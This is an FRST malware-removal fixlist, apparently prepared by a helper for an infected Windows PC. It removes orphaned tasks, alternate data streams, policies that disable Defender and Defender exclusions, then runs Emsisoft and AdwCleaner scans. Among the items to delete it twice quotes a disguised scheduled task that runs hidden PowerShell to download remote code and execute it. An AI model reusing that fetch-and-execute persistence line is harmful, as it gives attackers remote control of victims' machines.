Start::
CreateRestorePoint:
CloseProcesses:

2026-04-25 22:58 - 2026-04-25 22:58 - 000000000 ____D C:\Users\Joel Castro\AppData\Roaming\RenPy
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-3237484940-2862176218-2778486117-1001\...\Run: [AMDNoiseSuppression] => "C:\WINDOWS\system32\AMD\ANR\AMDNoiseSuppression.exe" (No File)
S3 cpuz149; no ImagePath
S3 cpuz158; no ImagePath
S1 eoiuuags; no ImagePath
S1 pidgferk; no ImagePath
ShellIconOverlayIdentifiers: [       tdpico] -> {c88d4dbb-d890-40b6-bcc7-bca43c1eb5ee} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCSafeFolderShlExt.dll -> No File
AlternateDataStreams: C:\ProgramData\DP45977C.lfl:677104FCAA [5170]
AlternateDataStreams: C:\ProgramData\system.conf:0F57F3FDE6 [5170]
AlternateDataStreams: C:\ProgramData\system.conf:2EEF3BCE16 [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\RCDate.ini:1C726B22CB [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\RCDate.ini:1C78495C48 [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk:DC8F23BC3A [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RCDate.ini:D929617DE9 [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RCDate.ini:E09BDC68EB [5170]
AlternateDataStreams: C:\Users\Public\Documents\system.conf:430CBAC4A2 [4306]
AlternateDataStreams: C:\Users\Public\Documents\system.conf:9637CBAABE [5170]
FirewallRules: [{C15301B6-D166-4691-8EEC-55B3CB2955AF}] => (Block) %ProgramFiles%\Adobe\Adobe Illustrator 2022\Support Files\Contents\Windows\Illustrator.exe => No File
FirewallRules: [{97496F92-2474-4531-AF8B-AAF2F35194FD}] => (Block) %ProgramFiles%\Adobe\Adobe Illustrator 2022\Support Files\Contents\Windows\Illustrator.exe => No File
FirewallRules: [TCP Query User{EE1F0E0D-5D8F-4798-8795-98D473D36F0F}D:\programas\resolve.exe] => (Allow) D:\programas\resolve.exe => No File
FirewallRules: [UDP Query User{1026D6E6-DE59-4531-A3A5-3997ABAE9CE0}D:\programas\resolve.exe] => (Allow) D:\programas\resolve.exe => No File
FirewallRules: [TCP Query User{603BFEAF-7F4C-46EA-A617-01E84C65774E}D:\programas\fuscript.exe] => (Allow) D:\programas\fuscript.exe => No File
FirewallRules: [UDP Query User{1F01084C-3675-45B8-B10E-EC27BDAEC037}D:\programas\fuscript.exe] => (Allow) D:\programas\fuscript.exe => No File
FirewallRules: [{002AC5E0-25A7-4BBD-B8F2-685980F1F457}] => (Allow) D:\Programas\Blackmagic Design\ElementsPanelDaemon.exe => No File
FirewallRules: [TCP Query User{DBA578E8-2927-4965-912B-ECBC4CD32DD4}C:\users\joel castro\appdata\local\capcut\apps\8.2.0.3462\capcut.exe] => (Allow) C:\users\joel castro\appdata\local\capcut\apps\8.2.0.3462\capcut.exe => No File
FirewallRules: [UDP Query User{C75A3F23-B0C2-4095-82DE-D31A6A369A22}C:\users\joel castro\appdata\local\capcut\apps\8.2.0.3462\capcut.exe] => (Allow) C:\users\joel castro\appdata\local\capcut\apps\8.2.0.3462\capcut.exe => No File
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
HKU\S-1-5-21-3237484940-2862176218-2778486117-1001\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {00c7cd58-2ad2-42e6-b2e4-885b1c07cc83} - no filepath. <==== ATTENTION
Task: {0a92fa98-799b-4823-8900-ceefda4cd81a} - no filepath. <==== ATTENTION
Task: {0cf28a1d-3081-4914-96d6-5f24ef7673a4} - no filepath. <==== ATTENTION
Task: {105D676A-D551-4274-81E7-97AC52E4FD87} - \Microsoft\Windows\Speech\HeadsetButtonPress -> No File <==== ATTENTION
Task: {1949073A-8FDA-4EA4-8E59-407CDB02440F} - \Microsoft\Windows\WindowsUpdate\sihpostreboot -> No File <==== ATTENTION
Task: {1d97447e-06ec-4b82-b251-30d57cf17038} - no filepath. <==== ATTENTION
Task: {1f49f36a-f987-4a19-8418-f5b445327584} - no filepath. <==== ATTENTION
Task: {23424976-e681-4465-abb9-07127dc58deb} - no filepath. <==== ATTENTION
Task: {287fcaa2-ee71-4cea-bce2-828caccf5e6b} - no filepath. <==== ATTENTION
Task: {29e9cbd2-e61d-4af9-934b-7e790a8b0000} - no filepath. <==== ATTENTION
Task: {2e4891de-d627-4a78-bcb6-f1829e121645} - no filepath. <==== ATTENTION
Task: {33b78077-fe72-471e-b579-80cb1d49d51c} - no filepath. <==== ATTENTION
Task: {352cf6c3-7f7d-4d68-90e1-05b099218bd2} - no filepath. <==== ATTENTION
Task: {3a98853b-7680-421b-9805-31fb1f915e69} - no filepath. <==== ATTENTION
Task: {4f169d9e-1132-4bba-a0b6-17d34f9e80d8} - no filepath. <==== ATTENTION
Task: {58b16592-0d5c-4321-ac33-ce35479e9a38} - no filepath. <==== ATTENTION
Task: {5a2083e9-fc5b-4f81-94f6-b2bcc6dcd544} - no filepath. <==== ATTENTION
Task: {5c211a57-a5b5-4e8d-b881-65325d7cc4b2} - no filepath. <==== ATTENTION
Task: {5cf63dd2-3081-459e-bd2c-703acc3c4ad3} - no filepath. <==== ATTENTION
Task: {60cd33df-6f98-44ec-b074-a2e1ec2e5ada} - no filepath. <==== ATTENTION
Task: {65e056c1-cdfd-4c4d-bd8b-21d6530ee079} - no filepath. <==== ATTENTION
Task: {66f69c7c-4224-43d2-97c6-726b38634934} - no filepath. <==== ATTENTION
Task: {7b2cd366-c3fe-415f-87e1-b730cf8d9dea} - no filepath. <==== ATTENTION
Task: {820d1fb3-d061-4e08-a8fb-c065717949c8} - no filepath. <==== ATTENTION
Task: {8a26adfa-bf15-4171-9803-1e26150bfa65} - no filepath. <==== ATTENTION
Task: {8ef1c1bb-2708-4c92-8aa1-3e0cdf5601a8} - no filepath. <==== ATTENTION
Task: {94903151-4551-4d2c-8876-eb0c0c913cc1} - no filepath. <==== ATTENTION
Task: {968a52c9-06ed-405d-bda5-cb419f2044bf} - no filepath. <==== ATTENTION
Task: {98d0cd9a-72c6-4c72-b70c-8552fadfcff9} - no filepath. <==== ATTENTION
Task: {9e3171a9-77ba-441b-9847-036935e79c79} - no filepath. <==== ATTENTION
Task: {a6f0042d-e958-4ad2-b74a-805f92ad5f04} - no filepath. <==== ATTENTION
Task: {a8d55453-5771-4764-9bc7-8aee15e8d335} - no filepath. <==== ATTENTION
Task: {ad0ad611-9a3d-4e5d-b0f8-0747caecd46a} - no filepath. <==== ATTENTION
Task: {b2e6706f-1275-4c15-9581-2f2e120b2b5d} - no filepath. <==== ATTENTION
Task: {b348cdd0-0fca-4748-ae19-7cc4f08a028d} - no filepath. <==== ATTENTION
Task: {bc2fc9fd-f390-4b7e-8731-1fd84b8cbdf3} - no filepath. <==== ATTENTION
Task: {c5d32a7c-4dac-467b-a310-e0d6da121342} - no filepath. <==== ATTENTION
Task: {cd3ff483-003d-4c21-833d-a85c4548881d} - no filepath. <==== ATTENTION
Task: {d2ad787b-4d66-48bd-a03c-62c86cd6edd6} - no filepath. <==== ATTENTION
Task: {d56cb12d-d536-4bfe-a0b0-e8198ba9cf52} - no filepath. <==== ATTENTION
Task: {dc310f67-4493-4ecf-b1e9-394d3cf57170} - no filepath. <==== ATTENTION
Task: {df4f9cfc-e79a-4429-8241-0545cd695c88} - no filepath. <==== ATTENTION
Task: {e91c97c9-466d-4015-aed9-cc048648a03e} - no filepath. <==== ATTENTION
Task: {ea185359-26bd-4de9-9533-118edc559f6e} - no filepath. <==== ATTENTION
Task: {ec67af91-4501-4a01-9c7d-e683a859a1b1} - no filepath. <==== ATTENTION
Task: {f7bd8264-7dee-4f3e-a544-42ab49229b68} - no filepath. <==== ATTENTION
Task: {fd5b4221-434a-4d52-a49a-2a31e1720d13} - no filepath. <==== ATTENTION
Task: {ff13cd21-4adc-45d4-95e0-ba00c5032413} - no filepath. <==== ATTENTION
Task: {9909A39A-F99E-45F4-856D-D072F6C18E3B} - System32\Tasks\Google Compatibility Appraiser CL_NCL_1bb985112a9376f8 => C:\WINDOWS\system32\conhost.exe [867840 2024-12-11] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
S3 cpuz154; C:\WINDOWS\temp\cpuz154\cpuz154_x64.sys [40976 2026-04-26] (Microsoft Windows Hardware Compatibility Publisher -> CPUID) <==== ATTENTION
FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2024-11-15] <==== ATTENTION (zero byte File/Folder)
Task: {9909A39A-F99E-45F4-856D-D072F6C18E3B} - System32\Tasks\Google Compatibility Appraiser CL_NCL_1bb985112a9376f8 => C:\WINDOWS\system32\conhost.exe [867840 2024-12-11] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION

HKU\S-1-5-21-3237484940-2862176218-2778486117-1001\...\Policies\Explorer: [DisallowRun] 0
2026-04-25 22:59 - 2026-04-25 22:59 - 000004434 _____ C:\WINDOWS\system32\Tasks\Google Compatibility Appraiser CL_NCL_1bb985112a9376f8


StartPowershell:
Try {
    $Paths=(Get-MpPreference).ExclusionPath
    $Extensions=(Get-MpPreference).ExclusionExtension
    $Processes=(Get-MpPreference).ExclusionProcess
    
    foreach ($Path in $Paths) { 
        Remove-MpPreference -ExclusionPath $Path -force -ErrorAction Stop
    }
    foreach ($Extension in $Extensions) { 
        Remove-MpPreference -ExclusionExtension $Extension -force -ErrorAction Stop
    }
    foreach ($Process in $Processes) { 
        Remove-MpPreference -ExclusionProcess $Process -force -ErrorAction Stop
    }
}
Catch {
    Write-Error "Error occurred while removing Windows Defender exclusions: $_"
}
EndPowershell:

StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from the Emsisoft's official site, updates it, scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUP's in 1) system memory 2) important folders as documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
    New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
    New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
    $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
    $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:

StartPowerShell:
# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan

New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:

CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*

EmptyTemp:
End::